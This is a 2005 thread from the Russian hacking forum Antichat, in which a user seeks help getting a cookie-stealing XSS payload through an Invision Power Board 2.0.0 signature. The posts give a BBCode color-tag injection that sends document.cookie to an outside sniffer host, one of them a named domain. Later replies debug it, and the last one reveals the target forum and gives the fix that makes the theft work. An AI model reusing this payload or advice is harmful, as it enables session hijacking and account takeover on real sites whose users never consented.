Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Это фильтр или что? (проблема со вставкой скрипта в Ipb 2.0.0) |
26.04.2005, 17:40
|
|
Новичок
Регистрация: 30.03.2005
Сообщений: 19
Провел на форуме:
0
Репутация:
0
|
|
Это фильтр или что? (проблема со вставкой скрипта в Ipb 2.0.0)
Код:
<div class="postcolor" style='padding:4px;'><span style='color:<img src='http://aaaaa/=`aaajpg' border='0' alt='user posted image' />'>` style=background:url(javascript:document.images[68].src="http://*******/sniff.jpg?"+document.cookie); </span></div>
Это получается поле вставки скрипта
Код:
[COLOR= ]` style=background:url(javascript:document.images[68].src="http://*******/sniff.pg?"+document.cookie); [/COLOR]
перед style появляется />'
Как можно это обойти? |
|
|
26.04.2005, 17:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
замени [COLOR=] на [color=#aaaaaa]
если не получится, назови версию форума... если это форум...
я подумаю
|
|
|
|
26.04.2005, 18:02
|
|
Новичок
Регистрация: 30.03.2005
Сообщений: 19
Провел на форуме:
0
Репутация:
0
|
|
Invision Power Board 2.0.0
Код:
<div class="signature" style="padding: 5px;">
<span style='color:#aaaaaa
<iМg src='http://aaaaa/=`aaajpg' border='0' alt='user posted image'
/>'>`style=background:url(javascript:document.images
[68].src="http://armadaplus.com/css/show.gif?"+document.cookie);</sрan></div>
Это получается после присвоения цвета.
Т.е получается так, что подпись не отображается, по идее должен работать скрипт. Но опять появлятеся /> |
|
|
|
26.04.2005, 20:30
|
|
Участник форума
Регистрация: 14.01.2005
Сообщений: 127
Провел на форуме:
96115
Репутация:
5
|
|
это потому что у тебя опера, а опера не видит знак `. то есть в эксплорере это подействует, а в опере - нет =) вот и всё =)
|
|
|
|
26.04.2005, 21:15
|
|
Новичок
Регистрация: 30.03.2005
Сообщений: 19
Провел на форуме:
0
Репутация:
0
|
|
нифига =)
Опера никак не вставит />. Это делает форум. Тем более, что проверяю я вставки в Ie.
|
|
|
|
30.04.2005, 22:33
|
|
Новичок
Регистрация: 30.03.2005
Сообщений: 19
Провел на форуме:
0
Репутация:
0
|
|
Не отключал он теги. Стандартные теги работаю же и я об этом говорил. Так что не пори чушь.
|
|
|
|
01.05.2005, 00:17
|
|
Banned
Регистрация: 28.04.2005
Сообщений: 3
Провел на форуме:
0
Репутация:
0
|
|
Чушь мелишь ссылку давай. Если у тебя в теле сообщения не работает, (Хотя чисто глядя на html который ты дал всё работает) то фильтры стоят.
|
|
|
|
03.05.2005, 00:26
|
|
Новичок
Регистрация: 30.03.2005
Сообщений: 19
Провел на форуме:
0
Репутация:
0
|
|
Тема закрыта, всем спасибо =)
|
|
|
|
03.05.2005, 04:27
|
|
Banned
Регистрация: 28.04.2005
Сообщений: 3
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от Telepuz
Не отключал он теги. Стандартные теги работаю же и я об этом говорил. Так что не пори чушь.
Ну вот Я всё проверил, судя по тому коду который ты тут дал на форуме, он теги в подписи кроме картинки отключил. Откуда Я знаю что он теги в подписи отключил? Ну потому что Я прочитал твой html код который ты сам и дал!!!! Так что год, врать не умеет. =)))
Теперь, ты мне в приват прислал ссылку на тот форум который ты хотел взломать.
Ну так вот, Я там всё проверил, и в подписи и в сообщении фильров нету там всё работает. У тебя снифф не работал потому что у тебя 68 в коде. Это Админы в статье специально зделали чтобы Ламеры (В этом случае к сожалению как ты, но только не обижайся=) ) не ломали форумы. =))))))
Так что поменяй на 1. =))))
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
